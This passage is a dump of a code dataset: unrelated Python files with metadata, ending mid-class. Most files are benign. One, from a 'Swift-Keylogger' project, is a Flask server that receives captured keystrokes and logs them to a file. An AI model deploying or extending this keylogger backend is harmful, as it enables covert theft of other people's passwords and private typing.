# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from vas.shared.Deletable import Deletable
from vas.shared.MutableCollection import MutableCollection
from vas.shared.Resource import Resource
class InstallationImages(MutableCollection):
"""A collection of installation images
:ivar `vas.shared.Security.Security` security: The resource's security
"""
def __init__(self, client, location, installation_image_class):
super(InstallationImages, self).__init__(client, location, 'installation-images', installation_image_class)
def create(self, path, version):
"""Creates an installation image by uploading a file to the server and assigning it a version
:param str path: The path of the file to upload
:param str version: The installation image's version
:rtype: :class:`vas.shared.InstallationImages.InstallationImage`
:return: The new installation image
"""
return self._create_multipart(path, {'version': version})
class InstallationImage(Resource, Deletable):
"""A product binary, typically are .zip or .tar.gz file, that has been uploaded to the server. Once created, an
installation image can then be used to create an installation on a group.
:ivar `vas.shared.Installations.Installations` installations: The installations that have been created from the
installation image
:ivar `vas.shared.Security.Security` security: The resource's security
:ivar int size: The installation image's size
:ivar str version: The installation image's version
"""
@property
def installations(self):
self.__installations = self.__installations or self._create_resources_from_links('installation',
self.__installation_class)
return self.__installations
@property
def size(self):
return self.__size
@property
def version(self):
return self.__version
def __init__(self, client, location, installation_class):
super(InstallationImage, self).__init__(client, location)
self.__installation_class = installation_class
self.__size = self._details['size']
self.__version = self._details['version']
def reload(self):
"""Reloads the installation image's details from the server"""
super(InstallationImage, self).reload()
self.__installations = None
def __str__(self):
return "<{} version={} size={}>".format(self.__class__.__name__, self.__version, self.__size) | en | 0.831124 | # vFabric Administration Server API # Copyright (c) 2012 VMware, Inc. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. A collection of installation images :ivar `vas.shared.Security.Security` security: The resource's security Creates an installation image by uploading a file to the server and assigning it a version :param str path: The path of the file to upload :param str version: The installation image's version :rtype: :class:`vas.shared.InstallationImages.InstallationImage` :return: The new installation image A product binary, typically are .zip or .tar.gz file, that has been uploaded to the server. Once created, an installation image can then be used to create an installation on a group. :ivar `vas.shared.Installations.Installations` installations: The installations that have been created from the installation image :ivar `vas.shared.Security.Security` security: The resource's security :ivar int size: The installation image's size :ivar str version: The installation image's version Reloads the installation image's details from the server | 2.082409 | 2 |
src/semantickit/app/lsi_model.py | dhchenx/semantic-kit | 1 | 6617359 | <gh_stars>1-10
import logging
logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)
from gensim import corpora
def build_lsi_model(data_path="sentences.txt",stopwords_path="stopwords_english.txt",save_dict_path="model_dict.dict",save_corpus_path="model_corpus.mm"):
documents = []
with open(data_path, encoding="utf-8") as file:
documents = [l.strip() for l in file]
stoplist = []
with open(stopwords_path, encoding="utf-8") as file:
stoplist = [l.strip() for l in file]
texts = [[word for word in document.lower().split() if word not in stoplist]
for document in documents]
# remove words that appear only once
from collections import defaultdict
frequency = defaultdict(int)
for text in texts:
for token in text:
frequency[token] += 1
texts = [[token for token in text if frequency[token] > 1]
for text in texts]
from pprint import pprint # pretty-printer
pprint(texts)
dictionary = corpora.Dictionary(texts)
dictionary.save(save_dict_path) # store the dictionary, for future reference
print(dictionary)
print(dictionary.token2id)
# new_doc = "Human computer interaction"
# new_vec = dictionary.doc2bow(new_doc.lower().split())
# print(new_vec) # the word "interaction" does not appear in the dictionary and is ignored
corpus = [dictionary.doc2bow(text) for text in texts]
corpora.MmCorpus.serialize(save_corpus_path, corpus) # store to disk, for later use
print(corpus)
# build_lsi_model()
| import logging
logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)
from gensim import corpora
def build_lsi_model(data_path="sentences.txt",stopwords_path="stopwords_english.txt",save_dict_path="model_dict.dict",save_corpus_path="model_corpus.mm"):
documents = []
with open(data_path, encoding="utf-8") as file:
documents = [l.strip() for l in file]
stoplist = []
with open(stopwords_path, encoding="utf-8") as file:
stoplist = [l.strip() for l in file]
texts = [[word for word in document.lower().split() if word not in stoplist]
for document in documents]
# remove words that appear only once
from collections import defaultdict
frequency = defaultdict(int)
for text in texts:
for token in text:
frequency[token] += 1
texts = [[token for token in text if frequency[token] > 1]
for text in texts]
from pprint import pprint # pretty-printer
pprint(texts)
dictionary = corpora.Dictionary(texts)
dictionary.save(save_dict_path) # store the dictionary, for future reference
print(dictionary)
print(dictionary.token2id)
# new_doc = "Human computer interaction"
# new_vec = dictionary.doc2bow(new_doc.lower().split())
# print(new_vec) # the word "interaction" does not appear in the dictionary and is ignored
corpus = [dictionary.doc2bow(text) for text in texts]
corpora.MmCorpus.serialize(save_corpus_path, corpus) # store to disk, for later use
print(corpus)
# build_lsi_model() | en | 0.769021 | # remove words that appear only once # pretty-printer # store the dictionary, for future reference # new_doc = "Human computer interaction" # new_vec = dictionary.doc2bow(new_doc.lower().split()) # print(new_vec) # the word "interaction" does not appear in the dictionary and is ignored # store to disk, for later use # build_lsi_model() | 2.782916 | 3 |
def_square.py | BjornChrisnach/intro_to_python_UTA_Arlington | 0 | 6617360 | # Write a function that accepts a number as argument and returns
# the square of the number. For example if the number passed to
# the function is 5 then your function should return 25.
# def my_square(input_number):
# square = input_number**2
# return int(square)
def my_square(x):
result = x**2
return int(result)
| # Write a function that accepts a number as argument and returns
# the square of the number. For example if the number passed to
# the function is 5 then your function should return 25.
# def my_square(input_number):
# square = input_number**2
# return int(square)
def my_square(x):
result = x**2
return int(result)
| en | 0.600839 | # Write a function that accepts a number as argument and returns # the square of the number. For example if the number passed to # the function is 5 then your function should return 25. # def my_square(input_number): # square = input_number**2 # return int(square) | 4.137019 | 4 |
Networks/web_crawler/stephjspider.py | mischiefsleep/Den-Core-2019 | 0 | 6617361 | <filename>Networks/web_crawler/stephjspider.py
#!/usr/bin/python3
# <NAME>
# <EMAIL>
# Simple Web Scraper, gets all links and images from a single webpage.
import requests
from parsel import Selector
import os
import time
start = time.time()
ScanDir = '/tmp/Web_Crawler'
# Check for directory and create one for output of scan
if not os.path.exists(ScanDir):
os.mkdir(ScanDir)
print("Directory" , ScanDir , " created.")
else:
print("Directory" , ScanDir, " already exists!")
# Get input for website we would like to crawl
website = input("What site are we crawling? ")
# GET request to the site
response = requests.get(website)
## Setup for scraping tool
# "response.txt" contain all web page content
selector = Selector(response.text)
# Extracting href attribute from anchor tag <a href="*">
href_links = selector.xpath('//a/@href').getall()
#Extracting img src attribute from img tag <img src="*">
image_links = selector.xpath('//img/@src').getall()
# Print out the web page links in order, separated by line
print('***************************** Web Page Links ************************************')
print(*href_links, sep = "\n")
print(*href_links, file=open('/tmp/Web_Crawler/Web_links.txt', 'w'))
print('*****************************************************************')
# Print image links from website, separated by line
print('***************************** Image Links ************************************')
print(*image_links, sep = "\n")
print(*image_links, file=open('/tmp/Web_Crawler/Image_links.txt', 'w'))
print('*****************************************************************')
# Amount of time the spider took to crawl the site.
end = time.time()
print("Time taken in seconds : ", (end-start)) | <filename>Networks/web_crawler/stephjspider.py
#!/usr/bin/python3
# <NAME>
# <EMAIL>
# Simple Web Scraper, gets all links and images from a single webpage.
import requests
from parsel import Selector
import os
import time
start = time.time()
ScanDir = '/tmp/Web_Crawler'
# Check for directory and create one for output of scan
if not os.path.exists(ScanDir):
os.mkdir(ScanDir)
print("Directory" , ScanDir , " created.")
else:
print("Directory" , ScanDir, " already exists!")
# Get input for website we would like to crawl
website = input("What site are we crawling? ")
# GET request to the site
response = requests.get(website)
## Setup for scraping tool
# "response.txt" contain all web page content
selector = Selector(response.text)
# Extracting href attribute from anchor tag <a href="*">
href_links = selector.xpath('//a/@href').getall()
#Extracting img src attribute from img tag <img src="*">
image_links = selector.xpath('//img/@src').getall()
# Print out the web page links in order, separated by line
print('***************************** Web Page Links ************************************')
print(*href_links, sep = "\n")
print(*href_links, file=open('/tmp/Web_Crawler/Web_links.txt', 'w'))
print('*****************************************************************')
# Print image links from website, separated by line
print('***************************** Image Links ************************************')
print(*image_links, sep = "\n")
print(*image_links, file=open('/tmp/Web_Crawler/Image_links.txt', 'w'))
print('*****************************************************************')
# Amount of time the spider took to crawl the site.
end = time.time()
print("Time taken in seconds : ", (end-start)) | en | 0.827264 | #!/usr/bin/python3 # <NAME> # <EMAIL> # Simple Web Scraper, gets all links and images from a single webpage. # Check for directory and create one for output of scan # Get input for website we would like to crawl # GET request to the site ## Setup for scraping tool # "response.txt" contain all web page content # Extracting href attribute from anchor tag <a href="*"> #Extracting img src attribute from img tag <img src="*"> # Print out the web page links in order, separated by line # Print image links from website, separated by line # Amount of time the spider took to crawl the site. | 3.552307 | 4 |
examples/sts_b_web.py | anwar1103/semantic-text-similarit | 167 | 6617362 | <filename>examples/sts_b_web.py<gh_stars>100-1000
from semantic_text_similarity.models import WebBertSimilarity
from semantic_text_similarity.data import load_sts_b_data
from scipy.stats import pearsonr
train, dev, test = load_sts_b_data()
model = WebBertSimilarity()
predictions = model.predict(dev)
print(pearsonr([instance["similarity"] for instance in dev], predictions))
| <filename>examples/sts_b_web.py<gh_stars>100-1000
from semantic_text_similarity.models import WebBertSimilarity
from semantic_text_similarity.data import load_sts_b_data
from scipy.stats import pearsonr
train, dev, test = load_sts_b_data()
model = WebBertSimilarity()
predictions = model.predict(dev)
print(pearsonr([instance["similarity"] for instance in dev], predictions))
| none | 1 | 2.246262 | 2 | |
tia/db_curators/_exmpl_h5fileRW.py | jmakov/market_tia | 1 | 6617363 | from tables import *
class struct(IsDescription):
priceAvg = Float64Col()
#writing
filename = "db/asd.h5"
fl = Filters(complevel=9, complib='blosc', shuffle=1) #enable compression #from http://pytables.github.com/usersguide/libref/helper_classes.html#tables.Filters.complevel
h5file = openFile(filename, mode="w", title="Mt.GoxMarketDB", filters= fl)#, filters=fl)
group = h5file.createGroup("/", 'MtGox', 'Mt.Gox')
table = h5file.createTable(group, 'ticker', struct, "Readout example") #create table for chans
row_table = table.row
for i in xrange(1000000):
row_table['priceAvg'] = i
row_table.append()
table.flush()
h5file.close()
#reading
h5file = openFile(filename, mode="r", filters= fl)
for i in h5file:
print i
mytable = h5file.root.MtGox.ticker
for i in mytable.iterrows():
print i["priceAvg"]
h5file.close() | from tables import *
class struct(IsDescription):
priceAvg = Float64Col()
#writing
filename = "db/asd.h5"
fl = Filters(complevel=9, complib='blosc', shuffle=1) #enable compression #from http://pytables.github.com/usersguide/libref/helper_classes.html#tables.Filters.complevel
h5file = openFile(filename, mode="w", title="Mt.GoxMarketDB", filters= fl)#, filters=fl)
group = h5file.createGroup("/", 'MtGox', 'Mt.Gox')
table = h5file.createTable(group, 'ticker', struct, "Readout example") #create table for chans
row_table = table.row
for i in xrange(1000000):
row_table['priceAvg'] = i
row_table.append()
table.flush()
h5file.close()
#reading
h5file = openFile(filename, mode="r", filters= fl)
for i in h5file:
print i
mytable = h5file.root.MtGox.ticker
for i in mytable.iterrows():
print i["priceAvg"]
h5file.close() | en | 0.336617 | #writing #enable compression #from http://pytables.github.com/usersguide/libref/helper_classes.html#tables.Filters.complevel #, filters=fl) #create table for chans #reading | 2.756556 | 3 |
CYBER_SLAP.py | cyberninjaz/a-lot-of-stuff | 0 | 6617364 | <gh_stars>0
from random import randint
class Player():
hp = 1000
energy = 100
name = None
def __init__ (self, name):
self.name = name
def isAlive(self):
return self.hp > 0 and self.energy > 0
p1 = Player('<NAME>')
print('p1.name')
p2 = Player('<NAME>')
print(f'Hi {p2.name}')
class Attack():
name = None
mindamage = None
maxdamage = None
energy = None
hpheal = None
energyheal = None
def __init__ (self, name, mnD, mxD, e, hh, eh):
self.name = name
self.mindamage = mnD
self.maxdamage = mxD
self.energy = e
self.hpheal = hh
self.energyheal = eh
def use(self, user, target):
target.hp -= randint(self.mindamage, self.maxdamage)
user.energy -= self.energy
user.hp += self.hpheal
user.energy += self.energyheal
print('BOOM!!!')
def printStats(self):
print(f'{self.name}: Damage: {self.mindamage}-{self.maxdamage}, Energy: -{self.energy}, Health Heal: {self.hpheal}, Energy Heal: {self.energyheal}')
dogecoin = Attack('Dogecoin', 200, 300, 30, 0, 0)
bitcoin = Attack('Bitcoin', 200, 200, 20, 0, 0)
ethereum = Attack('Ethereum', 150, 150, 10, 0, 0)
litecoin = Attack('Litecoin', 100, 150, 5, 0, 0)
medicine = Attack('Medicine', 0, 0, 0, 100, 0)
food = Attack('Food', 0, 0, 0, 0, 10)
moves = [dogecoin, bitcoin, ethereum, litecoin, medicine, food]
def options():
for x in moves:
x.printStats()
while p1.hp > 0 and p2.hp > 0 and p1.energy > 0 and p2.energy > 0:
options()
move = input('Move: ')
for x in moves:
if move == x.name:
x.use(p1, p2)
break
print(f'Player 2 health: {p2.hp}')
print(f'Player 1 energy: {p1.energy}')
options()
move = input('Move: ')
for x in moves:
if move == x.name:
x.use(p2, p1)
break
print(f'Player 1 health: {p1.hp}')
print(f'Player 2 energy: {p2.energy}')
if p1.energy == 0 or p1.hp == 0:
print('PLAYER 2 WON!!!')
elif p2.energy == 0 or p2.hp == 0:
print('PLAYER 1 WON!!!') | from random import randint
class Player():
hp = 1000
energy = 100
name = None
def __init__ (self, name):
self.name = name
def isAlive(self):
return self.hp > 0 and self.energy > 0
p1 = Player('<NAME>')
print('p1.name')
p2 = Player('<NAME>')
print(f'Hi {p2.name}')
class Attack():
name = None
mindamage = None
maxdamage = None
energy = None
hpheal = None
energyheal = None
def __init__ (self, name, mnD, mxD, e, hh, eh):
self.name = name
self.mindamage = mnD
self.maxdamage = mxD
self.energy = e
self.hpheal = hh
self.energyheal = eh
def use(self, user, target):
target.hp -= randint(self.mindamage, self.maxdamage)
user.energy -= self.energy
user.hp += self.hpheal
user.energy += self.energyheal
print('BOOM!!!')
def printStats(self):
print(f'{self.name}: Damage: {self.mindamage}-{self.maxdamage}, Energy: -{self.energy}, Health Heal: {self.hpheal}, Energy Heal: {self.energyheal}')
dogecoin = Attack('Dogecoin', 200, 300, 30, 0, 0)
bitcoin = Attack('Bitcoin', 200, 200, 20, 0, 0)
ethereum = Attack('Ethereum', 150, 150, 10, 0, 0)
litecoin = Attack('Litecoin', 100, 150, 5, 0, 0)
medicine = Attack('Medicine', 0, 0, 0, 100, 0)
food = Attack('Food', 0, 0, 0, 0, 10)
moves = [dogecoin, bitcoin, ethereum, litecoin, medicine, food]
def options():
for x in moves:
x.printStats()
while p1.hp > 0 and p2.hp > 0 and p1.energy > 0 and p2.energy > 0:
options()
move = input('Move: ')
for x in moves:
if move == x.name:
x.use(p1, p2)
break
print(f'Player 2 health: {p2.hp}')
print(f'Player 1 energy: {p1.energy}')
options()
move = input('Move: ')
for x in moves:
if move == x.name:
x.use(p2, p1)
break
print(f'Player 1 health: {p1.hp}')
print(f'Player 2 energy: {p2.energy}')
if p1.energy == 0 or p1.hp == 0:
print('PLAYER 2 WON!!!')
elif p2.energy == 0 or p2.hp == 0:
print('PLAYER 1 WON!!!') | none | 1 | 3.279297 | 3 | |
net_models/models/__init__.py | mihudec/netcm | 0 | 6617365 | <gh_stars>0
import inspect
from net_models.models.BaseModels import *
from net_models.models.services import *
from net_models.models.interfaces import *
from net_models.models.routing import *
models_map = {k:v for k, v in dict(globals()).items() if inspect.isclass(v) and issubclass(v, BaseNetModel)}
| import inspect
from net_models.models.BaseModels import *
from net_models.models.services import *
from net_models.models.interfaces import *
from net_models.models.routing import *
models_map = {k:v for k, v in dict(globals()).items() if inspect.isclass(v) and issubclass(v, BaseNetModel)} | none | 1 | 1.767454 | 2 | |
Server/app.py | orlandoamorim/Swift-Keylogger | 0 | 6617366 | from flask import Flask
from flask import request
app = Flask(__name__)
fob=open('log.txt','a')
@app.route('/keylogger', methods=['POST'])
def receive_keys():
if request.method == "POST":
if request.is_json:
data = request.get_json()
fob.write(data['input'])
print(data['input'])
fob.write('\n')
return "Ok", 200
app.run()
| from flask import Flask
from flask import request
app = Flask(__name__)
fob=open('log.txt','a')
@app.route('/keylogger', methods=['POST'])
def receive_keys():
if request.method == "POST":
if request.is_json:
data = request.get_json()
fob.write(data['input'])
print(data['input'])
fob.write('\n')
return "Ok", 200
app.run()
| none | 1 | 2.709582 | 3 | |
tests/lib/cytest/bootstrap.py | andyjost/Sprite | 1 | 6617367 | '''
Defines in pure ICurry a few simple modules designed for system testing.
'''
from curry.icurry import *
from curry.icurry.json import load
from curry import unboxed
# An arbitrary choice id.
_cid = 527
cid = unboxed(_cid)
def blk(expr):
return IBlock(vardecls=[], assigns=[], stmt=expr)
def retbody(expr):
return IFuncBody(blk(IReturn(expr)))
def getbootstrap():
return IModule(
name='bootstrap'
, imports=['Prelude']
, types=[
IType(
name='bootstrap.NUM'
, constructors=[
IConstructor('bootstrap.N', 0) # Nullary
, IConstructor('bootstrap.M', 0) # A distinct nullary, to test choices.
, IConstructor('bootstrap.U', 1) # Unary
, IConstructor('bootstrap.B', 2) # Binary
]
)
]
, functions=[
IFunction('bootstrap.ZN', 0, body=retbody(ICCall('bootstrap.N')))
, IFunction('bootstrap.ZF', 0, body=retbody(ICCall('Prelude._Failure')))
, IFunction('bootstrap.ZQ', 0, body=retbody(
ICCall('Prelude._Choice', [_cid, ICCall('bootstrap.N'), ICCall('bootstrap.M')])
))
# ^^^
# Not correctly typed, but three arguments are needed here.
, IFunction('bootstrap.ZW', 0, body=retbody(ICCall('Prelude._Fwd', [ICCall('bootstrap.N')])))
# Evaluates its argument and then returns a FWD node refering to it.
, IFunction('bootstrap.Z' , 1, body=IFuncBody(IBlock(
vardecls=[IVarDecl(1)]
, assigns=[IVarAssign(1, IVarAccess(0, path=[0]))]
, stmt=ICaseCons(
1
, branches=[
IConsBranch("bootstrap.N", 0, blk(IReturn(IVar(1))))
, IConsBranch("bootstrap.M", 0, blk(IReturn(IVar(1))))
, IConsBranch("bootstrap.U", 1, blk(IReturn(IFCall("Prelude.failed"))))
, IConsBranch("bootstrap.B", 2, blk(IReturn(IFCall("Prelude.failed"))))
]
)
)))
]
)
def getlist():
return IModule(
name='mylist', imports=['Prelude'], functions=[]
, types=[
IType(
name='mylist.List'
, constructors=[
IConstructor('mylist.Cons', 2)
, IConstructor('mylist.Nil', 0)
]
)
]
)
def getx():
return IModule(
name='X', imports=['Prelude'], functions=[]
, types=[
IType(
name='X.X'
, constructors=[IConstructor('X.X', 1)]
)
]
)
def getexample():
return load('data/json/example.json')
| '''
Defines in pure ICurry a few simple modules designed for system testing.
'''
from curry.icurry import *
from curry.icurry.json import load
from curry import unboxed
# An arbitrary choice id.
_cid = 527
cid = unboxed(_cid)
def blk(expr):
return IBlock(vardecls=[], assigns=[], stmt=expr)
def retbody(expr):
return IFuncBody(blk(IReturn(expr)))
def getbootstrap():
return IModule(
name='bootstrap'
, imports=['Prelude']
, types=[
IType(
name='bootstrap.NUM'
, constructors=[
IConstructor('bootstrap.N', 0) # Nullary
, IConstructor('bootstrap.M', 0) # A distinct nullary, to test choices.
, IConstructor('bootstrap.U', 1) # Unary
, IConstructor('bootstrap.B', 2) # Binary
]
)
]
, functions=[
IFunction('bootstrap.ZN', 0, body=retbody(ICCall('bootstrap.N')))
, IFunction('bootstrap.ZF', 0, body=retbody(ICCall('Prelude._Failure')))
, IFunction('bootstrap.ZQ', 0, body=retbody(
ICCall('Prelude._Choice', [_cid, ICCall('bootstrap.N'), ICCall('bootstrap.M')])
))
# ^^^
# Not correctly typed, but three arguments are needed here.
, IFunction('bootstrap.ZW', 0, body=retbody(ICCall('Prelude._Fwd', [ICCall('bootstrap.N')])))
# Evaluates its argument and then returns a FWD node refering to it.
, IFunction('bootstrap.Z' , 1, body=IFuncBody(IBlock(
vardecls=[IVarDecl(1)]
, assigns=[IVarAssign(1, IVarAccess(0, path=[0]))]
, stmt=ICaseCons(
1
, branches=[
IConsBranch("bootstrap.N", 0, blk(IReturn(IVar(1))))
, IConsBranch("bootstrap.M", 0, blk(IReturn(IVar(1))))
, IConsBranch("bootstrap.U", 1, blk(IReturn(IFCall("Prelude.failed"))))
, IConsBranch("bootstrap.B", 2, blk(IReturn(IFCall("Prelude.failed"))))
]
)
)))
]
)
def getlist():
return IModule(
name='mylist', imports=['Prelude'], functions=[]
, types=[
IType(
name='mylist.List'
, constructors=[
IConstructor('mylist.Cons', 2)
, IConstructor('mylist.Nil', 0)
]
)
]
)
def getx():
return IModule(
name='X', imports=['Prelude'], functions=[]
, types=[
IType(
name='X.X'
, constructors=[IConstructor('X.X', 1)]
)
]
)
def getexample():
return load('data/json/example.json')
| en | 0.868464 | Defines in pure ICurry a few simple modules designed for system testing. # An arbitrary choice id. # Nullary # A distinct nullary, to test choices. # Unary # Binary # ^^^ # Not correctly typed, but three arguments are needed here. # Evaluates its argument and then returns a FWD node refering to it. | 2.497217 | 2 |
optaux/helper_functions/characterize_auxotrophs.py | coltonlloyd/OptAux | 1 | 6617368 | import cobra
from cobra.flux_analysis.parsimonious import optimize_minimal_flux
import numpy as np
def get_auxotrophic_mets_per_ko(cons_model, KOs, growth_rate=.1):
metabolite_list = []
model = cons_model.copy()
for r in KOs:
model.reactions.get_by_id(r).knock_out()
if model.optimize().f > growth_rate:
return []
solver = cobra.solvers.solver_dict['gurobi']
lp = solver.create_problem(model)
for rxn in model.reactions.query('EX_'):
old_bounds = (rxn.lower_bound, rxn.upper_bound)
index = model.reactions.index(rxn)
solver.change_variable_bounds(lp, index, -10., old_bounds[1])
solver.solve_problem(lp)
# get the status and growth rate
status = solver.get_status(lp)
# reset the problem
solver.change_variable_bounds(lp, index, old_bounds[0], old_bounds[1])
f = solver.get_objective_value(lp) if status == "optimal" else 0.
if f > .1:
metabolite_list.append(rxn.id)
return metabolite_list
def get_avg_flux_required(cons_model, KOs, aux_metabolite_list):
fluxes = []
model = cons_model.copy()
biomass = list(model.objective.keys())[0]
for r2 in KOs:
model.reactions.get_by_id(r2).knock_out()
for r in aux_metabolite_list:
if r == 'EX_h2o_e':
continue
r_obj = model.reactions.get_by_id(r)
model.objective = biomass
r_obj.lower_bound = -10
# sol = model.optimize()
biomass.lower_bound = .1
biomass.upper_bound = .1
model.objective = r_obj
sol2 = model.optimize()
try:
print(r, sol2.x_dict[r])
fluxes.append(sol2.x_dict[r])
except:
print(r, KOs, 'ISSUE')
r_obj.lower_bound = 0.
biomass.lower_bound = 0.
biomass.upper_bound = 1000.
if len(fluxes) > 0:
return np.array(fluxes).mean()
else:
return None
def get_blocked_biomass(cons_model, KOs):
blocked = []
model = cons_model.copy()
biomass = list(model.objective.keys())[0]
for r in KOs:
model.reactions.get_by_id(r).knock_out()
for metabolite in biomass.reactants:
demand = cobra.Reaction('DM_' + metabolite.id)
demand.add_metabolites({metabolite: -1})
model.add_reaction(demand)
model.change_objective(demand)
sol2 = model.optimize()
if sol2.f < .1:
blocked.append(metabolite.id)
return blocked
def gene_names_per_kos(model, KOs):
gene_names = []
for ko in KOs:
print(model.reactions.get_by_id(ko).gene_name_reaction_rule)
gene_names.append(
model.reactions.get_by_id(ko).gene_name_reaction_rule)
return gene_names
def genes_per_kos(model, KOs):
genes = []
for ko in KOs:
genes.append(model.reactions.get_by_id(ko).gene_reaction_rule)
return genes
def to_string(list):
return ', '.join(list)
def and_join_strings(list):
return ' & '.join(list)
def id_to_name(model, ids):
names = []
for i in ids:
if i.startswith('EX_'):
names.append(model.reactions.get_by_id(i).name)
else:
names.append(model.metabolites.get_by_id(i).name)
return names
| import cobra
from cobra.flux_analysis.parsimonious import optimize_minimal_flux
import numpy as np
def get_auxotrophic_mets_per_ko(cons_model, KOs, growth_rate=.1):
metabolite_list = []
model = cons_model.copy()
for r in KOs:
model.reactions.get_by_id(r).knock_out()
if model.optimize().f > growth_rate:
return []
solver = cobra.solvers.solver_dict['gurobi']
lp = solver.create_problem(model)
for rxn in model.reactions.query('EX_'):
old_bounds = (rxn.lower_bound, rxn.upper_bound)
index = model.reactions.index(rxn)
solver.change_variable_bounds(lp, index, -10., old_bounds[1])
solver.solve_problem(lp)
# get the status and growth rate
status = solver.get_status(lp)
# reset the problem
solver.change_variable_bounds(lp, index, old_bounds[0], old_bounds[1])
f = solver.get_objective_value(lp) if status == "optimal" else 0.
if f > .1:
metabolite_list.append(rxn.id)
return metabolite_list
def get_avg_flux_required(cons_model, KOs, aux_metabolite_list):
fluxes = []
model = cons_model.copy()
biomass = list(model.objective.keys())[0]
for r2 in KOs:
model.reactions.get_by_id(r2).knock_out()
for r in aux_metabolite_list:
if r == 'EX_h2o_e':
continue
r_obj = model.reactions.get_by_id(r)
model.objective = biomass
r_obj.lower_bound = -10
# sol = model.optimize()
biomass.lower_bound = .1
biomass.upper_bound = .1
model.objective = r_obj
sol2 = model.optimize()
try:
print(r, sol2.x_dict[r])
fluxes.append(sol2.x_dict[r])
except:
print(r, KOs, 'ISSUE')
r_obj.lower_bound = 0.
biomass.lower_bound = 0.
biomass.upper_bound = 1000.
if len(fluxes) > 0:
return np.array(fluxes).mean()
else:
return None
def get_blocked_biomass(cons_model, KOs):
blocked = []
model = cons_model.copy()
biomass = list(model.objective.keys())[0]
for r in KOs:
model.reactions.get_by_id(r).knock_out()
for metabolite in biomass.reactants:
demand = cobra.Reaction('DM_' + metabolite.id)
demand.add_metabolites({metabolite: -1})
model.add_reaction(demand)
model.change_objective(demand)
sol2 = model.optimize()
if sol2.f < .1:
blocked.append(metabolite.id)
return blocked
def gene_names_per_kos(model, KOs):
gene_names = []
for ko in KOs:
print(model.reactions.get_by_id(ko).gene_name_reaction_rule)
gene_names.append(
model.reactions.get_by_id(ko).gene_name_reaction_rule)
return gene_names
def genes_per_kos(model, KOs):
genes = []
for ko in KOs:
genes.append(model.reactions.get_by_id(ko).gene_reaction_rule)
return genes
def to_string(list):
return ', '.join(list)
def and_join_strings(list):
return ' & '.join(list)
def id_to_name(model, ids):
names = []
for i in ids:
if i.startswith('EX_'):
names.append(model.reactions.get_by_id(i).name)
else:
names.append(model.metabolites.get_by_id(i).name)
return names
| en | 0.711163 | # get the status and growth rate # reset the problem # sol = model.optimize() | 2.178311 | 2 |
nice/utils/optimization/heuristic.py | DBrughmans/NICE | 17 | 6617369 | from abc import ABC,abstractmethod
from nice.utils.optimization.reward import *
import numpy as np
class optimization(ABC):
@abstractmethod
def optimize(self):
pass
class best_first(optimization):
def __init__(self,data,reward_function:RewardFunction):
self.reward_function = reward_function
self.data = data
def optimize(self,NN):
CF_candidate = self.data.X.copy()
stop = False
while stop == False:
diff = np.where(CF_candidate != NN)[1]
X_prune = np.tile(CF_candidate, (len(diff), 1))
for r, c in enumerate(diff):
X_prune[r, c] = NN[0, c]
CF_candidate = self.reward_function.calculate_reward(X_prune,CF_candidate)
if self.data.predict_fn(CF_candidate).argmax() in self.data.target_class:
return CF_candidate
| from abc import ABC,abstractmethod
from nice.utils.optimization.reward import *
import numpy as np
class optimization(ABC):
@abstractmethod
def optimize(self):
pass
class best_first(optimization):
def __init__(self,data,reward_function:RewardFunction):
self.reward_function = reward_function
self.data = data
def optimize(self,NN):
CF_candidate = self.data.X.copy()
stop = False
while stop == False:
diff = np.where(CF_candidate != NN)[1]
X_prune = np.tile(CF_candidate, (len(diff), 1))
for r, c in enumerate(diff):
X_prune[r, c] = NN[0, c]
CF_candidate = self.reward_function.calculate_reward(X_prune,CF_candidate)
if self.data.predict_fn(CF_candidate).argmax() in self.data.target_class:
return CF_candidate
| none | 1 | 3.246669 | 3 | |
pyoptix/matrix4x4.py | juhyeonkim95/PyOptiX | 0 | 6617370 | import math
import numpy as np
class Matrix4x4:
def __init__(self):
self.matrix = np.eye(4, dtype=np.float32)
@staticmethod
def from_basis(u, v, w, c):
matrix = Matrix4x4()
for i in range(3):
matrix.matrix[i, 0] = u[i]
matrix.matrix[i, 1] = v[i]
matrix.matrix[i, 2] = w[i]
matrix.matrix[i, 3] = c[i]
return matrix
def inverse(self):
ret = Matrix4x4()
ret.matrix[0:3, 0:3] = self.matrix[0:3, 0:3].transpose()
ret.matrix[0:3, 3] = -ret.matrix[0:3, 0:3].dot(self.matrix[0:3, 3])
return ret
def to_parameters(self, as_degree=False):
x, y, z = self.matrix[0:3, 3]
a, b, c = self.mat2euler(self.matrix[0:3, 0:3])
if as_degree:
a = math.degrees(a)
b = math.degrees(b)
c = math.degrees(c)
ret = [x, y, z, a, b, c]
return np.array(ret)
@staticmethod
def mat2euler(M, cy_thresh=None):
M = np.asarray(M)
if cy_thresh is None:
try:
cy_thresh = np.finfo(M.dtype).eps * 4
except ValueError:
cy_thresh = np.finfo(float).eps * 4.0
r11, r12, r13, r21, r22, r23, r31, r32, r33 = M.flat
cy = math.sqrt(r33 * r33 + r23 * r23)
if cy > cy_thresh:
z = math.atan2(-r12, r11)
y = math.atan2(r13, cy)
x = math.atan2(-r23, r33)
else:
z = math.atan2(r21, r22)
y = math.atan2(r13, cy)
x = 0.0
return x, y, z
| import math
import numpy as np
class Matrix4x4:
def __init__(self):
self.matrix = np.eye(4, dtype=np.float32)
@staticmethod
def from_basis(u, v, w, c):
matrix = Matrix4x4()
for i in range(3):
matrix.matrix[i, 0] = u[i]
matrix.matrix[i, 1] = v[i]
matrix.matrix[i, 2] = w[i]
matrix.matrix[i, 3] = c[i]
return matrix
def inverse(self):
ret = Matrix4x4()
ret.matrix[0:3, 0:3] = self.matrix[0:3, 0:3].transpose()
ret.matrix[0:3, 3] = -ret.matrix[0:3, 0:3].dot(self.matrix[0:3, 3])
return ret
def to_parameters(self, as_degree=False):
x, y, z = self.matrix[0:3, 3]
a, b, c = self.mat2euler(self.matrix[0:3, 0:3])
if as_degree:
a = math.degrees(a)
b = math.degrees(b)
c = math.degrees(c)
ret = [x, y, z, a, b, c]
